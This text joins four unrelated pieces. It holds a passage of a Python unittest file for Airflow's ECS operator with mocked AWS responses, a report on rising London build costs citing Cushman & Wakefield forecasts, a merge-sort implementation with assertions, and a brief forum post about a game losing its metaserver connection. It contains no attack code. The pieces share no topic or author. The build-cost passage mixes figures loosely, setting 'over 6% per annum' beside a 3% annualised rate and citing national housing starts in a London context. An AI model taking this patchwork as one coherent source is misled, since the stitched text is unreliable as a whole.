"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55"
}
],
"desiredStatus": "RUNNING",
"lastStatus": "PENDING",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55",
"taskDefinitionArn": "arn:aws:ecs:us-east-1:012345678910:task-definition/hello_world:11"
}
]
}
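# The dict above mirrors the shape of a boto3 ECS run_task response
# (abridged; real responses carry additional task-level fields).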
class TestECSOperator(unittest.TestCase):
@mock.patch('airflow.contrib.operators.ecs_operator.AwsHook')
def setUp(self, aws_hook_mock):
configuration.load_test_config()
self.aws_hook_mock = aws_hook_mock
self.ecs = ECSOperator(
task_id='task',
task_definition='t',
cluster='c',
overrides={},
aws_conn_id=None,
region_name='eu-west-1',
group='group',
placement_constraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
network_configuration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
def test_init(self):
self.assertEqual(self.ecs.region_name, 'eu-west-1')
self.assertEqual(self.ecs.task_definition, 't')
self.assertEqual(self.ecs.aws_conn_id, None)
self.assertEqual(self.ecs.cluster, 'c')
self.assertEqual(self.ecs.overrides, {})
self.assertEqual(self.ecs.hook, self.aws_hook_mock.return_value)
self.aws_hook_mock.assert_called_once_with(aws_conn_id=None)
def test_template_fields_overrides(self):
self.assertEqual(self.ecs.template_fields, ('overrides',))
@mock.patch.object(ECSOperator, '_wait_for_task_ended')
@mock.patch.object(ECSOperator, '_check_success_task')
def test_execute_without_failures(self, check_mock, wait_mock):
client_mock = self.aws_hook_mock.return_value.get_client_type.return_value
client_mock.run_task.return_value = RESPONSE_WITHOUT_FAILURES
self.ecs.execute(None)
self.aws_hook_mock.return_value.get_client_type.assert_called_once_with('ecs',
region_name='eu-west-1')
client_mock.run_task.assert_called_once_with(
cluster='c',
launchType='EC2',
overrides={},
            startedBy=mock.ANY,  # Can be 'airflow' or 'Airflow'
taskDefinition='t',
group='group',
placementConstraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
platformVersion='LATEST',
networkConfiguration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
wait_mock.assert_called_once_with()
check_mock.assert_called_once_with()
self.assertEqual(self.ecs.arn,
'arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55')
def test_execute_with_failures(self):
client_mock = self.aws_hook_mock.return_value.get_client_type.return_value
resp_failures = deepcopy(RESPONSE_WITHOUT_FAILURES)
resp_failures['failures'].append('dummy error')
client_mock.run_task.return_value = resp_failures
with self.assertRaises(AirflowException):
self.ecs.execute(None)
self.aws_hook_mock.return_value.get_client_type.assert_called_once_with('ecs',
region_name='eu-west-1')
client_mock.run_task.assert_called_once_with(
cluster='c',
launchType='EC2',
overrides={},
            startedBy=mock.ANY,  # Can be 'airflow' or 'Airflow'
taskDefinition='t',
group='group',
placementConstraints=[
{
'expression': 'attribute:ecs.instance-type =~ t2.*',
'type': 'memberOf'
}
],
platformVersion='LATEST',
networkConfiguration={
'awsvpcConfiguration': {
'securityGroups': ['sg-123abc']
}
}
)
def test_wait_end_tasks(self):
client_mock = mock.Mock()
self.ecs.arn = 'arn'
self.ecs.client = client_mock
self.ecs._wait_for_task_ended()
client_mock.get_waiter.assert_called_once_with('tasks_stopped')
client_mock.get_waiter.return_value.wait.assert_called_once_with(
cluster='c', tasks=['arn'])
self.assertEqual(
sys.maxsize, client_mock.get_waiter.return_value.config.max_attempts)
def test_check_success_tasks_raises(self):
client_mock = mock.Mock()
self.ecs.arn = 'arn'
self.ecs.client = client_mock
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'foo',
'lastStatus': 'STOPPED',
'exitCode': 1
}]
}]
}
with self.assertRaises(Exception) as e:
self.ecs._check_success_task()
# Ordering of str(dict) is not guaranteed.
self.assertIn("This task is not in success state ", str(e.exception))
self.assertIn("'name': 'foo'", str(e.exception))
self.assertIn("'lastStatus': 'STOPPED'", str(e.exception))
self.assertIn("'exitCode': 1", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_tasks_raises_pending(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'container-name',
'lastStatus': 'PENDING'
}]
}]
}
with self.assertRaises(Exception) as e:
self.ecs._check_success_task()
# Ordering of str(dict) is not guaranteed.
self.assertIn("This task is still pending ", str(e.exception))
self.assertIn("'name': 'container-name'", str(e.exception))
self.assertIn("'lastStatus': 'PENDING'", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_tasks_raises_multiple(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'foo',
'exitCode': 1
}, {
'name': 'bar',
'lastStatus': 'STOPPED',
'exitCode': 0
}]
}]
}
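        # Despite the name, this payload should not trip the failure check:
        # the container with exitCode 1 never reports lastStatus 'STOPPED'.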
self.ecs._check_success_task()
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_host_terminated_raises(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'stoppedReason': 'Host EC2 (instance i-1234567890abcdef) terminated.',
"containers": [
{
"containerArn": "arn:aws:ecs:us-east-1:012345678910:container/e1ed7aac-d9b2-4315-8726-d2432bf11868", # noqa: E501
"lastStatus": "RUNNING",
"name": "wordpress",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55" # noqa: E501
}
],
"desiredStatus": "STOPPED",
"lastStatus": "STOPPED",
"taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55", # noqa: E501
"taskDefinitionArn": "arn:aws:ecs:us-east-1:012345678910:task-definition/hello_world:11" # noqa: E501
}]
}
with self.assertRaises(AirflowException) as e:
self.ecs._check_success_task()
self.assertIn(
"The task was stopped because the host instance terminated:",
str(e.exception))
self.assertIn("Host EC2 (", str(e.exception))
self.assertIn(") terminated", str(e.exception))
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
def test_check_success_task_not_raises(self):
client_mock = mock.Mock()
self.ecs.client = client_mock
self.ecs.arn = 'arn'
client_mock.describe_tasks.return_value = {
'tasks': [{
'containers': [{
'name': 'container-name',
'lastStatus': 'STOPPED',
'exitCode': 0
}]
}]
}
self.ecs._check_success_task()
client_mock.describe_tasks.assert_called_once_with(
cluster='c', tasks=['arn'])
if __name__ == '__main__':
unittest.main()
|
According to Cushman & Wakefield's latest Q2 Residential Aggregator, out today, the inexorable rise in build costs continues to be one of the main causes for concern in the property industry, with build costs rising by over 6% per annum over the past two years. There was a slowdown in the rate of inflation during the first half of 2014; however, the growth rate has picked up again in recent months and during Q1 2015 costs rose at an annualised rate of 3%.
Costs are coming under increasing upward pressure, partly due to the rising cost of materials: the price of bricks, for example, rose by 9% in the first six months of 2015. However, the primary driver of cost inflation is the severe shortage of skills facing the construction industry, which is resulting in significant upward pressure on wages.
Looking ahead, the picture isn’t expected to change much over the short term. The latest C&W consensus build cost forecasts predict that costs will rise by 6% in 2015 and a further 5% in 2016, compared with house price growth in London of 3% and 5%. With costs continuing to rise faster than prices, land prices are likely to remain stable.
The recent election campaign brought into focus the country’s inability to build enough homes. While London continues to fall short in the number of houses built each year, the number of starts and completions is increasing. The latest figures from DCLG show that the number of homes built in Q1 2015 was the highest quarterly total in three years, and there were 9,500 houses started, the highest quarterly total in over 25 years.
Looking ahead, the uplift in construction starts is a welcome sign for London; however, with build costs forecast to keep rising and land in short supply, the uplift is likely to be temporary and will do little to solve the supply and demand imbalance in the capital. |
def threeway_compare(x,y):
if x < y:
return -1
elif x == y:
return 0
else:
return 1
def merge(left, right, compare=threeway_compare):
result = []
i, j = 0, 0
while i < len(left) and j < len(right):
if compare(left[i], right[j]) <= 0:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
result += left[i:]
result += right[j:]
return result
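# Note: taking from `left` on ties (compare(...) <= 0 above) makes the sort
# stable, preserving the input order of equal elements.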
def merge_sort(lst, compare=threeway_compare):
if len(lst) <= 1:
return lst
else:
        middle = len(lst) // 2
left = merge_sort(lst[:middle], compare)
right = merge_sort(lst[middle:], compare)
return merge(left, right, compare)
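# merge_sort runs in O(n log n): the list is halved at each of the
# O(log n) recursion levels, and merge() does linear work per level.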
if __name__ == "__main__":
cmp = lambda x,y: -1 if x < y else (0 if x == y else 1)
assert merge_sort([], cmp) == []
assert merge_sort([1], cmp) == [1]
assert merge_sort([1,2], cmp) == [1,2]
assert merge_sort([2,1], cmp) == [1,2]
assert merge_sort([1,2,3]) == [1,2,3]
assert merge_sort([2,1,3], cmp) == [1,2,3]
assert merge_sort([3,2,1], cmp) == [1,2,3]
assert merge_sort([3,4,8,0,6,7,4,2,1,9,4,5]) == [0,1,2,3,4,4,4,5,6,7,8,9]
print('all tests passed!')
|
Hmm, not sure what happened - nothing useful in the logs that I can see. If anyone was online and paying attention when it happened let me know if you noticed anything relevant going on at the time.
I hosted a game on 1.8.1 beta, started it, when it loaded it said disconnected from metaserver or something. Didn't notice anything unusual, aside from the metaserver message which I hadn't seen before.
Must have overloaded from how many people were online! |